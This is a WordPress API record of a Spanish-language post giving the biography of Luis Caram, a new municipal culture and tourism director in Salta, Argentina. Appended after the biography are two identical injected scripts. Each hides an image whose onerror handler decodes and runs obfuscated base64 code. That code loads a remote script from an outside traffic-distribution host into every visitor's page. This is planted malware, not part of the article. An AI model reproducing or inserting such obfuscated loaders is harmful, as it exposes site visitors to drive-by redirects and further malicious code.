{"id":3422,"date":"2023-12-13T22:09:02","date_gmt":"2023-12-14T01:09:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3422"},"modified":"2025-08-14T00:03:26","modified_gmt":"2025-08-14T03:03:26","slug":"luis-caram-director-de-cultura-y-turismo-del-municipio-de-rosario-de-la-frontera","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3422","title":{"rendered":"LUIS CARAM: Flamante Director de Cultura y Turismo del Municipio de Rosario de la Frontera"},"content":{"rendered":"\n<p>Naci\u00f3 en El Galp\u00f3n, Salta. Estudi\u00f3 en la Facultad de Arquitectura de la U.N.T. Paralelamente estudi\u00f3 escultura y teatro.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Comenz\u00f3 su actividad profesional en Tucum\u00e1n, protagonizando Las Alegres Comadres de Windsor de Shakespeare, Orlando Furioso de Ariosto, Locos de Verano de Gregorio dde Laferre, Prometeo Encadenado de Esquilo y Amadeus de Schaffer. Con esta \u00faltima obra la Asociaci\u00f3n Argentina de ACtores le otorg\u00f3 el premio Artea por su interpretaci\u00f3n de Mozart.<\/li>\n\n\n\n<li><\/li>\n\n\n\n<li>Es autor de \u00abLa Pasi\u00f3n de Taf\u00ed del Valle\u00bb junto a Jorge Scanavino.<\/li>\n\n\n\n<li>Gan\u00f3 la Beca a la Producci\u00f3n Art\u00edstica del Fondo Nacional de las Artes para la especialidad de Artes Pl\u00e1sticas. Se perfeccion\u00f3 en Buenos Aires en t\u00e9cnicas escult\u00f3ricascon Leo Vinci, Antonio Pujia y Mabel Santos.<\/li>\n\n\n\n<li><\/li>\n\n\n\n<li>Con una beca de la O.E.A. se traslad\u00f3 a Washington D.C. donde se radic\u00f3 por 10 a\u00f1os.<\/li>\n\n\n\n<li>Trabajando para diferentes compa\u00f1\u00edas de dicha ciudad interpret\u00f3 El Jaguar Azul de D\u00edaz, Caballero de milagro de Lope de Vega, Una visita inoportuna de Copy, con la que represent\u00f3 a Estados Unidos en el Festival de Caracas, Venezuela.<\/li>\n\n\n\n<li><\/li>\n\n\n\n<li>En la O.E.A. present\u00f3 La Pasi\u00f3n de Don Juan junto a V\u00edctor Laplace, dirigidos por Daniel Su\u00e1rez Marsal. Estren\u00f3 para los Estados Unidos El P\u00fablico de Federico Garc\u00eda Lorca. Adem\u00e1s protagoniz\u00f3 La Dama Boba de Lope de Vega en versi\u00f3n de Garc\u00eda Lorca, Clean de Edwin S\u00e1nchez, La Granada de Rodolfo Walsh, El Arquitecto y El Emperador de Asiria de Fernando Arrabal entre muchas otras.<\/li>\n\n\n\n<li><\/li>\n\n\n\n<li>Simult\u00e1neamente realiz\u00f3 muestras individuales y colectivas de arte y cur\u00f3 eventos tales como \u00abArt for Life\u00bb en la Pan American Health Organization y el Museo de Las Am\u00e9ricas de la O.E.A.<\/li>\n\n\n\n<li><\/li>\n\n\n\n<li>Posteriormente se traslad\u00f3 a Delhi, India, donde particip\u00f3 d ela \u00f3pera Le Fakir des B\u00e9nar\u00e8s de L\u00e9o Manuel dirigida por Muzaffar Ali. Con Mourad Ali realiz\u00f3 el espect\u00e1culo Three Voices.<\/li>\n\n\n\n<li>De regreso en Argentina vivi\u00f3 en Buenos Aires trabajando en la gesti\u00f3n p\u00fablica.<\/li>\n\n\n\n<li><\/li>\n\n\n\n<li>En 2005 regres\u00f3 a El Galp\u00f3n haci\u00e9ndose cargo del \u00e1rea de cultura de la municipalidad; all\u00ed junto a Jorge Scanavino y Jorge Raful realiz\u00f3 La Pasi\u00f3n en El Galp\u00f3n durante seis a\u00f1os.<\/li>\n\n\n\n<li>En el a\u00f1o 2009 se radic\u00f3 en la Ciudad de Salta. Paritcip\u00f3 de Encuentro de Culturas y Pedro y el Lobo de Serg\u00e9i Prok\u00f3fiev con el Ballet y la Orquesta Sinf\u00f3nica de la Provincia. Actu\u00f3 en Lo Mejor del Amor, Nos hubi\u00e9ramos Amado Tanto, Ligero de Equipaje, La Madonnita de Kartun; Callej\u00f3n sin Salida de Beltr\u00e1n-Sarapura; Extra\u00f1os Modos de Tolaba, con el Teatro Estable de Salta en Todos Queremos Ser Don Juan y La Tempestad Reciclada de Idangel Betancourt y de la zarzuela La del Soto del Parral de Soutullo y Vert.<\/li>\n\n\n\n<li><\/li>\n\n\n\n<li>Dirigi\u00f3 El Tercer Fausto de Novo; Nostalgias y Soledades de Crtez, Pavlov de Ott, 24 horas de Monti.<\/li>\n\n\n\n<li>Su obra escult\u00f3rica forma parte de colecciones oficiales y privadas nacionales e internacionales.<\/li>\n\n\n\n<li>Dise\u00f1\u00f3 escenograf\u00edas, vestuarios y maquinaria esc\u00e9nica para espect\u00e1culos teatrales y cinematogr\u00e1ficos.<\/li>\n\n\n\n<li><\/li>\n\n\n\n<li>Entre otros recibi\u00f3 los premios \u00abIris Marga\u00bb, Cepys, Tucum\u00e1n, \u00abSpecial Award\u00bb Office of Latino Service, Washington D.C., \u00abGene Fray Award\u00bb, Washington D.C., \u00abProtagonista Award\u00bb G.A.L.A. Washington D.C., \u00abMenci\u00f3n de Honor\u00bb Cardones con Alma, Fundaci\u00f3n Alegr\u00eda, Secretar\u00eda de Cultura de la Provincia.<\/li>\n<\/ul>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Naci\u00f3 en El Galp\u00f3n, Salta. Estudi\u00f3 en la Facultad de Arquitectura de la U.N.T. Paralelamente estudi\u00f3 escultura y teatro.<\/p>\n","protected":false},"author":2,"featured_media":3423,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3422","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3422"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3422"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3422\/revisions"}],"predecessor-version":[{"id":6892,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3422\/revisions\/6892"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3423"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3422"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3422"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3422"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}